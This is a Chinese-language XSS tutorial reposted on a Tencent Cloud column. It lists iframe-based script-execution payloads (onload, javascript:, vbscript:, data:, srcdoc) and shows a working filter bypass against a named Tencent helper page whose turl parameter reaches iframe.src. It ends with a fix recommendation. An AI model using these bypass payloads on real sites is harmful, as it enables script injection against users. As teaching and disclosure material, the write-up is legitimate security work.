前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >那些年我们一起学XSS - 11. Dom Xss进阶 [善变iframe]

那些年我们一起学XSS - 11. Dom Xss进阶 [善变iframe]

作者头像
渗透攻击红队
发布2019-11-20 11:20:55
1.7K0
发布2019-11-20 11:20:55
举报
文章被收录于专栏:漏洞知识库漏洞知识库
漏洞知识库

网络安全/渗透测试/代码审计/

关注

Dom Xss进阶 [善变iframe]

有时候,输出还会出现在 <iframe src="[输出]"></iframe> 。iframe 的 src属性本来应该是一个网址,但是iframe之善变,使得它同样可以执行javascript,而且可以用不同的姿势来执行。这一类问题,我将其归为[路径可控]问题。当然上面说到的是普通的反射型XSS。有时候程序员会使用javascript来动态的改变iframe的src属性,譬如:iframeA.src="[可控的url]"; 同样会导致XSS问题,来看看本例吧~

1. 先来说说iframe的变化。 1.1 最好懂的,onload执行js <iframe onload="alert(1)"></iframe> 1.2 src 执行javascript代码 <iframe src="javascript:alert(1)"></iframe> 1.3 IE下vbscript执行代码 <iframe src="vbscript:msgbox(1)"></iframe> 1.4 Chrome下data协议执行代码 <iframe src="data:text/html,<script>alert(1)</script>"></iframe> Chrome 1.5 上面的变体 <iframe src="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"></iframe> 1.6 Chrome下srcdoc属性 <iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;"></iframe> 2. 有兴趣的,可以一个一个的去测试上面的效果,注意浏览器的特异性哦。 3. 接着我们来看看具体的例子。

http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=aaaaaa&gid=yl&cid=68&from=

4. 我们先开调试工具,看看有没有可见的输出。

可以看到,我们参数的aaaaaa被带入到了<iframe src="这里"></iframe>。 这样一来,就满足了我们的使用条件。 我们试试

http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=javascript:alert(1);&gid=yl&cid=68&from=

。。竟然没反应。我们来看看刚才的那个地方。

可以看到,src这次没属性了,看来腾讯做了什么过滤。我们继续搜索下一个toolframe试试。 恩,看来就是这段代码导致的。

一起看看这段代码。

function OpenFrame(url) {
	if (url.toLowerCase().indexOf('http://') != '-1' || url.toLowerCase().indexOf('https://') != '-1' || url.toLowerCase().indexOf('javascript:') != '-1') return false;
	document.getElementById("toolframe").src = url;
}

不难看出,腾讯对 javascript:做出了判断。

document.getElementById("toolframe").src = url;

这句是导致XSS的一句代码。而openFrame的url参数则来自于(无关代码省略):

...
var tool_url = getQueryStringValue("turl");
...
openFrame(tool_url);
...

5. 根据我们上面说道的iframe的利用方法,我们不难看出,腾讯的过滤是不完善的。 在IE下,我们可以使用vbscript来执行代码。vbscript里 ' 单引号表示注释,类似JS里的//

http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=vbscript:msgbox(1)'&gid=yl&cid=68&from=

在chrome下,我们可以用data协议来执行JS。

http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=data:text/html,<script>alert(1)</script>'&gid=yl&cid=68&from=

6. 就到这里。

修复方案:

危险的不光是javascript:, vbscript:, data: 等同样需要过滤。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-09-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 漏洞知识库 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档